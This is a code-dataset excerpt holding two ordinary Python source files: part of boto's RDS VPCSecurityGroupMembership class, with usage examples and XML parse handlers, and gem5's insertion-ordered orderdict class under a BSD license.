# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents a VPCSecurityGroupMembership
"""
class VPCSecurityGroupMembership(object):
"""
Represents VPC Security Group that this RDS database is a member of
Properties reference available from the AWS documentation at
http://docs.aws.amazon.com/AmazonRDS/latest/APIReference/\
API_VpcSecurityGroupMembership.html
Example::
pri = "sg-abcdefgh"
sec = "sg-hgfedcba"
# Create with list of str
db = c.create_dbinstance(... vpc_security_groups=[pri], ... )
# Modify with list of str
db.modify(... vpc_security_groups=[pri,sec], ... )
# Create with objects
memberships = []
membership = VPCSecurityGroupMembership()
membership.vpc_group = pri
memberships.append(membership)
db = c.create_dbinstance(... vpc_security_groups=memberships, ... )
# Modify with objects
memberships = d.vpc_security_groups
membership = VPCSecurityGroupMembership()
membership.vpc_group = sec
memberships.append(membership)
db.modify(... vpc_security_groups=memberships, ... )
:ivar connection: :py:class:`boto.rds.RDSConnection` associated with the
current object
:ivar vpc_group: This id of the VPC security group
:ivar status: Status of the VPC security group membership
<boto.ec2.securitygroup.SecurityGroup>` objects that this RDS Instance
is a member of
"""
def __init__(self, connection=None, status=None, vpc_group=None):
self.connection = connection
self.status = status
self.vpc_group = vpc_group
def __repr__(self):
return 'VPCSecurityGroupMembership:%s' % self.vpc_group
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'VpcSecurityGroupId':
self.vpc_group = value
elif name == 'Status':
self.status = value
else:
setattr(self, name, value)
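# Illustrative parse flow (assumed response fragment): boto's XML handler
# drives startElement/endElement above while walking markup such as
#
#   <VpcSecurityGroupMembership>
#       <VpcSecurityGroupId>sg-abcdefgh</VpcSecurityGroupId>
#       <Status>active</Status>
#   </VpcSecurityGroupMembership>
#
# so endElement() populates vpc_group and status one field at a time.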
| apache-2.0 |
Menooker/gem5_pcm | src/python/m5/util/orderdict.py | 88 | 2718 | # Copyright (c) 2005 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
__all__ = [ 'orderdict' ]
from UserDict import DictMixin
class orderdict(dict, DictMixin):
def __init__(self, *args, **kwargs):
if len(args) > 1:
raise TypeError("expected at most one argument, got %d" % \
len(args))
self._keys = []
self.update(*args, **kwargs)
def __setitem__(self, key, item):
if key not in self:
self._keys.append(key)
super(orderdict, self).__setitem__(key, item)
def __delitem__(self, key):
super(orderdict, self).__delitem__(key)
self._keys.remove(key)
def clear(self):
super(orderdict, self).clear()
self._keys = []
def iterkeys(self):
for key in self._keys:
yield key
def itervalues(self):
for key in self._keys:
yield self[key]
def iteritems(self):
for key in self._keys:
yield key, self[key]
def keys(self):
return self._keys[:]
def values(self):
return [ self[key] for key in self._keys ]
    def items(self):
        return [ (key, self[key]) for key in self._keys ]
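# Minimal usage sketch (not part of the original module): orderdict preserves
# insertion order, which plain dict did not guarantee on the Python 2
# interpreters gem5 targeted.
#
#   d = orderdict()
#   d['b'] = 1
#   d['a'] = 2
#   assert d.keys() == ['b', 'a']
#   assert d.items() == [('b', 1), ('a', 2)]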
| bsd-3-clause |